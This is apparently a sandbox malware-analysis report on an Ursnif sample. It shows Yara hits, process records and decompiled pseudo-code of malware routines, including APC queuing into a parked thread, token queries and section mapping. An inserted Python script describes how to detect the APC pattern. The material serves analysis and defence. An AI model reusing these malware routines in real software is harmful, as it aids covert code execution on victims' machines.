                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Start time:16:20:45
                                    Start date:07/10/2021
                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                    Imagebase:0x7ff7e25b0000
                                    File size:823560 bytes
                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:20:45
                                    Start date:07/10/2021
                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
                                    Imagebase:0x50000
                                    File size:822536 bytes
                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:21:30
                                    Start date:07/10/2021
                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                    Wow64 process (32bit):false
                                    Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                                    Imagebase:0x7ff7e25b0000
                                    File size:823560 bytes
                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Start time:16:21:30
                                    Start date:07/10/2021
                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
                                    Imagebase:0x50000
                                    File size:822536 bytes
                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Disassembly

                                    Code Analysis


                                      Executed Functions

                                      C-Code - Quality: 93%
                                      			E00FA7DD8(signed char* __eax, intOrPtr* _a4) {
                                      				signed int _v12;
                                      				void* _v16;
                                      				CHAR* _v20;
                                      				struct _FILETIME _v28;
                                      				void* _v32;
                                      				void* _v36;
                                      				char* _v40;
                                      				signed int _v44;
                                      				long _v344;
                                      				struct _WIN32_FIND_DATAA _v368;
                                      				signed int _t72;
                                      				void* _t74;
                                      				signed int _t76;
                                      				void* _t78;
                                      				intOrPtr _t81;
                                      				CHAR* _t83;
                                      				void* _t85;
                                      				signed char _t89;
                                      				signed char _t91;
                                      				intOrPtr _t93;
                                      				void* _t96;
                                      				long _t99;
                                      				int _t101;
                                      				signed int _t109;
                                      				char* _t111;
                                      				void* _t113;
                                      				int _t119;
                                      				char _t128;
                                      				void* _t134;
                                      				signed int _t136;
                                      				char* _t139;
                                      				signed int _t140;
                                      				char* _t141;
                                      				char* _t146;
                                      				signed char* _t148;
                                      				int _t151;
                                      				void* _t152;
                                      				void* _t153;
                                      				void* _t154;
                                      				void* _t165;
                                      
                                      				_v12 = _v12 & 0x00000000;
                                      				_t148 = __eax;
                                      				_t72 =  *0xfad22c; // 0x63699bc3
                                      				_t74 = RtlAllocateHeap( *0xfad1f0, 0, _t72 ^ 0x63699ac7);
                                      				_v20 = _t74;
                                      				if(_t74 == 0) {
                                      					L36:
                                      					return _v12;
                                      				}
                                      				_t76 =  *0xfad22c; // 0x63699bc3
                                      				_t78 = RtlAllocateHeap( *0xfad1f0, 0, _t76 ^ 0x63699bce);
                                      				_t146 = 0;
                                      				_v36 = _t78;
                                      				if(_t78 == 0) {
                                      					L35:
                                      					HeapFree( *0xfad1f0, _t146, _v20);
                                      					goto L36;
                                      				}
                                      				_t136 =  *0xfad22c; // 0x63699bc3
                                      				memset(_t78, 0, _t136 ^ 0x63699bce);
                                      				_t81 =  *0xfad230; // 0x2a9a5a8
                                      				_t154 = _t153 + 0xc;
                                      				_t5 = _t81 + 0xfae825; // 0x73797325
                                      				_t83 = E00FA99D3(_t5);
                                      				_v20 = _t83;
                                      				if(_t83 == 0) {
                                      					L34:
                                      					HeapFree( *0xfad1f0, _t146, _v36);
                                      					goto L35;
                                      				}
                                      				_t134 = 0xffffffffffffffff;
                                      				_v28.dwLowDateTime = 0x63699bce;
                                      				_v28.dwHighDateTime = 0x63699bce;
                                      				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                      				_v32 = _t85;
                                      				if(_t85 != 0x63699bce) {
                                      					GetFileTime(_t85,  &_v28, 0, 0);
                                      					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                      					asm("adc dword [ebp-0x14], 0xc9");
                                      					CloseHandle(_v32);
                                      				}
                                      				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                      				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                      				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                      				 *_t148 = _t91;
                                      				_v32 = _t91 & 0x000000ff;
                                      				_t93 =  *0xfad230; // 0x2a9a5a8
                                      				_t16 = _t93 + 0xfae846; // 0x642e2a5c
                                      				_v40 = _t146;
                                      				_v44 = _t89 & 0x000000ff;
                                      				__imp__(_v20, _t16);
                                      				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                      				_v16 = _t96;
                                      				if(_t96 == _t134) {
                                      					_t146 = 0;
                                      					goto L34;
                                      				}
                                      				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                      				while(_t99 > 0) {
                                      					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                      					if(_t101 == 0) {
                                      						FindClose(_v16);
                                      						_v16 = FindFirstFileA(_v20,  &_v368);
                                      						_v28.dwHighDateTime = _v344;
                                      						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                      					}
                                      					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                      				}
                                      				_v12 = _v12 & 0x00000000;
                                      				while(1) {
                                      					_t109 = _v44;
                                      					if(_v12 <= _t109) {
                                      						goto L15;
                                      					}
                                      					_t140 = _v12;
                                      					if(_t140 > _v32) {
                                      						_t141 = _v36;
                                      						 *_a4 = _t141;
                                      						while(1) {
                                      							_t128 =  *_t141;
                                      							if(_t128 == 0) {
                                      								break;
                                      							}
                                      							if(_t128 < 0x30) {
                                      								 *_t141 = _t128 + 0x20;
                                      							}
                                      							_t141 = _t141 + 1;
                                      						}
                                      						_v12 = 1;
                                      						FindClose(_v16); // executed
                                      						_t146 = 0;
                                      						goto L35;
                                      					}
                                      					_t165 = _t140 - _t109;
                                      					L15:
                                      					if(_t165 == 0 || _v12 == _v32) {
                                      						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                      						_t139 = _v40;
                                      						_t151 = _t111 -  &(_v368.cFileName);
                                      						_t113 = 0;
                                      						if(_t139 != 0) {
                                      							_t48 = _t151 - 4; // -4
                                      							_t113 = _t48;
                                      							if(_t113 > _t151) {
                                      								_t113 = 0;
                                      							}
                                      						}
                                      						if(_t151 > 4) {
                                      							_t151 = 4;
                                      						}
                                      						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                      						_t154 = _t154 + 0xc;
                                      						_v40 =  &(_v40[_t151]);
                                      					}
                                      					do {
                                      						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                      						if(_t119 == 0) {
                                      							FindClose(_v16);
                                      							_v16 = FindFirstFileA(_v20,  &_v368);
                                      						}
                                      					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                      					_v12 = _v12 + 1;
                                      				}
                                      			}

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,63699BC3,00FAD2E0), ref: 00FA7E03
                                      • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FA7E25
                                      • memset.NTDLL ref: 00FA7E3F
                                        • Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FA7E58,73797325), ref: 00FA99E4
                                        • Part of subcall function 00FA99D3: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FA99FE
                                      • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FA7E7D
                                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FA7E91
                                      • CloseHandle.KERNEL32(?), ref: 00FA7EA8
                                      • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FA7EB4
                                      • lstrcat.KERNEL32(?,642E2A5C), ref: 00FA7EF5
                                      • FindFirstFileA.KERNELBASE(?,?), ref: 00FA7F0B
                                      • CompareFileTime.KERNEL32(?,?), ref: 00FA7F29
                                      • FindNextFileA.KERNELBASE(00FA9865,?), ref: 00FA7F3D
                                      • FindClose.KERNEL32(00FA9865), ref: 00FA7F4A
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00FA7F56
                                      • CompareFileTime.KERNEL32(?,?), ref: 00FA7F78
                                      • StrChrA.SHLWAPI(?,0000002E), ref: 00FA7FAB
                                      • memcpy.NTDLL(00FA3FAE,?,00000000), ref: 00FA7FE4
                                      • FindNextFileA.KERNELBASE(00FA9865,?), ref: 00FA7FF9
                                      • FindClose.KERNEL32(00FA9865), ref: 00FA8006
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00FA8012
                                      • CompareFileTime.KERNEL32(?,?), ref: 00FA8022
                                      • FindClose.KERNELBASE(00FA9865), ref: 00FA8057
                                      • HeapFree.KERNEL32(00000000,00FA3FAE,73797325), ref: 00FA8069
                                      • HeapFree.KERNEL32(00000000,?), ref: 00FA8079
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                                      • String ID:
                                      • API String ID: 455834338-0
                                      • Opcode ID: 1d0eafc8d0fc2926db175246ddab2201d19ddc79b8964dc448d5a423bf0baba5
                                      • Instruction ID: a5ef745c4d92ae39450e0f2b4c31dffa397d9dd8da42f497b81882b6f604248e
                                      • Opcode Fuzzy Hash: 1d0eafc8d0fc2926db175246ddab2201d19ddc79b8964dc448d5a423bf0baba5
                                      • Instruction Fuzzy Hash: A68149B2D00209EFDB109FA5DC84EEEBBB9FB4A340F10446AE501E2250D7749A44EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E10001000(intOrPtr _a4) {
                                      				struct _SYSTEMTIME _v44;
                                      				char _v48;
                                      				long _v52;
                                      				long _v56;
                                      				long _v60;
                                      				void* __edi;
                                      				long _t21;
                                      				int _t23;
                                      				long _t26;
                                      				long _t27;
                                      				void* _t28;
                                      				long _t31;
                                      				long _t32;
                                      				void* _t41;
                                      				intOrPtr _t43;
                                      				long _t48;
                                      				intOrPtr _t49;
                                      				signed int _t50;
                                      				void* _t57;
                                      				signed int _t61;
                                      				void* _t63;
                                      				intOrPtr* _t64;
                                      
                                      				_t21 = E1000166F();
                                      				_v52 = _t21;
                                      				if(_t21 != 0) {
                                      					L21:
                                      					return _t21;
                                      				} else {
                                      					goto L1;
                                      				}
                                      				do {
                                      					L1:
                                      					GetSystemTime( &_v44);
                                      					_t23 = SwitchToThread();
                                      					asm("cdq");
                                      					_t50 = 9;
                                      					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
                                      					_t26 = E100018B4(0, _t61); // executed
                                      					_v56 = _t26;
                                      					Sleep(_t61 << 5); // executed
                                      					_t21 = _v56;
                                      				} while (_t21 == 0xc);
                                      				if(_t21 != 0) {
                                      					goto L21;
                                      				}
                                      				_t27 = E100015F2(_t50); // executed
                                      				_v52 = _t27;
                                      				if(_t27 != 0) {
                                      					L19:
                                      					_t21 = _v52;
                                      					if(_t21 == 0xffffffff) {
                                      						_t21 = GetLastError();
                                      					}
                                      					goto L21;
                                      				}
                                      				if(_a4 != 0) {
                                      					L11:
                                      					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x1000414c, 0, 0); // executed
                                      					_t63 = _t28;
                                      					if(_t63 == 0) {
                                      						L18:
                                      						_v56 = GetLastError();
                                      						goto L19;
                                      					}
                                      					_t31 = QueueUserAPC(E1000116E, _t63,  &(_v44.wSecond)); // executed
                                      					if(_t31 == 0) {
                                      						_t48 = GetLastError();
                                      						TerminateThread(_t63, _t48);
                                      						CloseHandle(_t63);
                                      						_t63 = 0;
                                      						SetLastError(_t48);
                                      					}
                                      					if(_t63 == 0) {
                                      						goto L18;
                                      					} else {
                                      						_t32 = WaitForSingleObject(_t63, 0xffffffff);
                                      						_v60 = _t32;
                                      						if(_t32 == 0) {
                                      							GetExitCodeThread(_t63,  &_v60); // executed
                                      						}
                                      						CloseHandle(_t63);
                                      						goto L19;
                                      					}
                                      				}
                                      				if(E10001B50(_t50,  &_v48) != 0) {
                                      					 *0x10004138 = 0;
                                      					goto L11;
                                      				}
                                      				_t49 = _v48;
                                      				_t64 = __imp__GetLongPathNameW;
                                      				_t41 =  *_t64(_t49, 0, 0); // executed
                                      				_t57 = _t41;
                                      				if(_t57 == 0) {
                                      					L9:
                                      					 *0x10004138 = _t49;
                                      					goto L11;
                                      				}
                                      				_t15 = _t57 + 2; // 0x2
                                      				_t43 = E10001BD2(_t57 + _t15);
                                      				 *0x10004138 = _t43;
                                      				if(_t43 == 0) {
                                      					goto L9;
                                      				}
                                      				 *_t64(_t49, _t43, _t57); // executed
                                      				E100019CF(_t49);
                                      				goto L11;
                                      			}

                                      APIs
                                        • Part of subcall function 1000166F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,10001011), ref: 1000167E
                                        • Part of subcall function 1000166F: GetVersion.KERNEL32(?,10001011), ref: 1000168D
                                        • Part of subcall function 1000166F: GetCurrentProcessId.KERNEL32(?,10001011), ref: 1000169C
                                        • Part of subcall function 1000166F: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,10001011), ref: 100016B5
                                      • GetSystemTime.KERNEL32(?), ref: 10001024
                                      • SwitchToThread.KERNEL32 ref: 1000102A
                                        • Part of subcall function 100018B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000190A
                                        • Part of subcall function 100018B4: memcpy.NTDLL(?,10001045,?,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 1000199C
                                        • Part of subcall function 100018B4: VirtualFree.KERNELBASE(10001045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,10001045,00000000), ref: 100019B7
                                      • Sleep.KERNELBASE(00000000,00000000), ref: 1000104D
                                      • GetLongPathNameW.KERNEL32 ref: 10001095
                                      • GetLongPathNameW.KERNEL32 ref: 100010B3
                                      • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 100010DD
                                      • QueueUserAPC.KERNELBASE(1000116E,00000000,?), ref: 100010F4
                                      • GetLastError.KERNEL32 ref: 10001104
                                      • TerminateThread.KERNEL32(00000000,00000000), ref: 1000110E
                                      • CloseHandle.KERNEL32(00000000), ref: 10001115
                                      • SetLastError.KERNEL32(00000000), ref: 1000111A
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10001127
                                      • GetExitCodeThread.KERNELBASE(00000000,?), ref: 1000113B
                                      • CloseHandle.KERNEL32(00000000), ref: 10001142
                                      • GetLastError.KERNEL32 ref: 10001146
                                      • GetLastError.KERNEL32 ref: 10001159
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                                      • String ID:
                                      • API String ID: 2478182988-0
                                      • Opcode ID: 5e131395b6e8ee9ff1b3bb63a92e1ddb9bf3dbf1e668ccabee51a70913d2dfca
                                      • Instruction ID: b2810128257585a89669d1407e68cd0258d721067d3a17ee8238cd138ffee35b
                                      • Opcode Fuzzy Hash: 5e131395b6e8ee9ff1b3bb63a92e1ddb9bf3dbf1e668ccabee51a70913d2dfca
                                      • Instruction Fuzzy Hash: 3B41B371405661ABF312EF658CC88DFBBEDEBC57D0B014A1AF951C2158EB30D944CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%
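E10001000 above creates a thread whose start routine is the kernel32 export SleepEx, so the thread parameter taken from 0x1000414c is consumed as SleepEx's sleep duration; it then queues E1000116E to that thread with QueueUserAPC, waits on the thread handle and collects its exit code. A thread that exists only to sit in a wait export and receive an APC is the detection-relevant shape here. The following Python is an added example and not part of the sandbox report or the sample: it sketches detection logic over an API trace that has already been normalised into per-call records with start-routine addresses resolved to export names (an assumption about the trace format), and both the ALERTABLE_WAIT_EXPORTS list and the sample trace are constructed for the example.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ApiEvent:
    api: str      # API name as recorded in the trace
    args: tuple   # call arguments; ints for raw values, str for resolved symbols
    ret: int      # return value (the thread handle for CreateThread)


# Start routines that do nothing but block in a wait; a thread created directly on
# one of these has no code of its own and exists to receive APCs. Assumed list.
ALERTABLE_WAIT_EXPORTS = {
    "SleepEx", "WaitForSingleObjectEx", "WaitForMultipleObjectsEx",
    "SignalObjectAndWait", "NtDelayExecution",
}


def find_apc_into_parked_thread(events: Iterable[ApiEvent]) -> List[Tuple[int, str, object]]:
    """Return (thread_handle, start_routine, apc_routine) for every QueueUserAPC whose
    target handle came from a CreateThread that used a bare wait export as start routine.
    Handles are forgotten on CloseHandle/TerminateThread so a reused handle value is not
    mistaken for the parked thread."""
    parked: Dict[int, str] = {}
    hits: List[Tuple[int, str, object]] = []
    for ev in events:
        if ev.api == "CreateThread" and len(ev.args) >= 3:
            start_routine = ev.args[2]
            if ev.ret and start_routine in ALERTABLE_WAIT_EXPORTS:
                parked[ev.ret] = start_routine
        elif ev.api == "QueueUserAPC" and len(ev.args) >= 2:
            apc_routine, hthread = ev.args[0], ev.args[1]
            if hthread in parked:
                hits.append((hthread, parked[hthread], apc_routine))
        elif ev.api in ("CloseHandle", "TerminateThread") and ev.args:
            parked.pop(ev.args[0], None)
    return hits


# Constructed trace mirroring the call order in E10001000. Handle values, the sleep
# duration and the stack addresses are made up; E1000116E is the APC routine the
# decompiled code queues.
SAMPLE_TRACE = [
    ApiEvent("CreateThread", (0, 0, "SleepEx", 30000, 0, 0), 0x1A4),
    ApiEvent("QueueUserAPC", ("E1000116E", 0x1A4, 0x0019FE40), 1),
    ApiEvent("WaitForSingleObject", (0x1A4, 0xFFFFFFFF), 0),
    ApiEvent("GetExitCodeThread", (0x1A4, 0x0019FE30), 1),
    ApiEvent("CloseHandle", (0x1A4,), 1),
    # A worker thread with its own start routine that also receives an APC: not flagged.
    ApiEvent("CreateThread", (0, 0, "worker_main", 0, 0, 0), 0x1B0),
    ApiEvent("QueueUserAPC", ("on_timer", 0x1B0, 0), 1),
    ApiEvent("CloseHandle", (0x1B0,), 1),
]


if __name__ == "__main__":
    for hthread, start, apc in find_apc_into_parked_thread(SAMPLE_TRACE):
        print(f"thread {hthread:#x} parked in {start} received APC {apc}")
```

The match is deliberately on the pair (start routine is a wait export, APC queued to that handle) rather than on QueueUserAPC alone, which legitimate code uses freely; the handle map is cleared on CloseHandle so that a later thread reusing the same handle value does not inherit the verdict.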

                                      C-Code - Quality: 38%
                                      			E00FA7925(char _a4, void* _a8) {
                                      				void* _v8;
                                      				void* _v12;
                                      				char _v16;
                                      				void* _v20;
                                      				char _v24;
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v40;
                                      				void* _v44;
                                      				void** _t33;
                                      				void* _t40;
                                      				void* _t43;
                                      				void** _t44;
                                      				intOrPtr* _t47;
                                      				char _t48;
                                      
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v20 = _a4;
                                      				_t48 = 0;
                                      				_v16 = 0;
                                      				_a4 = 0;
                                      				_v44 = 0x18;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v36 = 0;
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                      					_t33 =  &_v8;
                                      					__imp__(_v12, 8, _t33);
                                      					if(_t33 >= 0) {
                                      						_t47 = __imp__;
                                      						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                      						_t44 = E00FA550F(_a4);
                                      						if(_t44 != 0) {
                                      							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                      							if(_t40 >= 0) {
                                      								memcpy(_a8,  *_t44, 0x1c);
                                      								_t48 = 1;
                                      							}
                                      							E00FAA07B(_t44);
                                      						}
                                      						NtClose(_v8); // executed
                                      					}
                                      					NtClose(_v12);
                                      				}
                                      				return _t48;
                                      			}

                                      APIs
                                      • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00FA796C
                                      • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00FA797F
                                      • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FA799B
                                        • Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B
                                      • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00FA79B8
                                      • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00FA79C5
                                      • NtClose.NTDLL(00000000), ref: 00FA79D7
                                      • NtClose.NTDLL(00000000), ref: 00FA79E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true
                                      • Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                      • String ID:
                                      • API String ID: 2575439697-0
                                      • Opcode ID: 9bc624c908619b099707d2bd4789ed43e87ddb9bc07888f7d4259187da7eeb96
                                      • Instruction ID: 31d2597b924daa80d3eda787435018ef1ff6179e1eee071f139c65f9a2b795b1
                                      • Opcode Fuzzy Hash: 9bc624c908619b099707d2bd4789ed43e87ddb9bc07888f7d4259187da7eeb96
                                      • Instruction Fuzzy Hash: 6321E5B2A0021CBBDB01AF95CC85DDEBFBDEF09750F104026F905E6161D7759A45EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E10001C22(intOrPtr* __eax, void** _a4) {
                                      				int _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				int _v28;
                                      				int _v32;
                                      				intOrPtr _v36;
                                      				int _v40;
                                      				int _v44;
                                      				void* _v48;
                                      				void* __esi;
                                      				long _t34;
                                      				void* _t39;
                                      				void* _t47;
                                      				intOrPtr* _t48;
                                      
                                      				_t48 = __eax;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v24 =  *((intOrPtr*)(__eax + 4));
                                      				_v16 = 0;
                                      				_v12 = 0;
                                      				_v48 = 0x18;
                                      				_v44 = 0;
                                      				_v36 = 0x40;
                                      				_v40 = 0;
                                      				_v32 = 0;
                                      				_v28 = 0;
                                      				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                      				if(_t34 < 0) {
                                      					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                      				} else {
                                      					 *_t48 = _v16;
                                      					_t39 = E10001AD1(_t48,  &_v12); // executed
                                      					_t47 = _t39;
                                      					if(_t47 != 0) {
                                      						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                      					} else {
                                      						memset(_v12, 0, _v24);
                                      						 *_a4 = _v12;
                                      					}
                                      				}
                                      				return _t47;
                                      			}

                                      APIs
                                      • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00000002), ref: 10001C7F
                                        • Part of subcall function 10001AD1: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C94,00000002,00000000,?,?,00000000,?,?,10001C94,?), ref: 10001AFE
                                      • memset.NTDLL ref: 10001CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Section$CreateViewmemset
                                      • String ID: @
                                      • API String ID: 2533685722-2766056989
                                      • Opcode ID: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
                                      • Instruction ID: 7cdd0864037accd0d9c91a557a1398572669c0b1d8c8e005f6ffc6b71ca10c32
                                      • Opcode Fuzzy Hash: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
                                      • Instruction Fuzzy Hash: F8211DB5D00209AFDB11CFA9C8859DEFBF9FF48354F104529E506F7210D730AA448BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E10001B13(void* __ecx) {
                                      				char _v8;
                                      				signed short _t7;
                                      
                                      				_v8 = _v8 & 0x00000000;
                                      				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                      				if(_t7 == 0) {
                                      					__imp__GetSystemDefaultUILanguage();
                                      					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                      				}
                                      				return _v8;
                                      			}

                                      APIs
                                      • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B28
                                      • GetSystemDefaultUILanguage.KERNEL32(?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B32
                                      • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,1000163E,?,?,?,00000000,00000000,?,?,?,10001069), ref: 10001B45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp
                                      Yara matches
                                      Similarity
                                      • API ID: Language$DefaultInfoLocaleNameSystem
                                      • String ID:
                                      • API String ID: 3724080410-0
                                      • Opcode ID: f130e9cac5bd96a94216972ee320fc07ba3693e86004bdbc49fafef2dbdab7d9
                                      • Instruction ID: 3de892749f2506132d90ec2e0237679401a7ce80bb2951cf583b000507d8d988
                                      • Opcode Fuzzy Hash: f130e9cac5bd96a94216972ee320fc07ba3693e86004bdbc49fafef2dbdab7d9
                                      • Instruction Fuzzy Hash: 53E04FA4641249B6F700DB91CD0AFBA73ACEB0078AF500044FB01E60C4E7B49E04A725
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E10001252(void* __eax, void* __edx) {
                                      				char _v8;
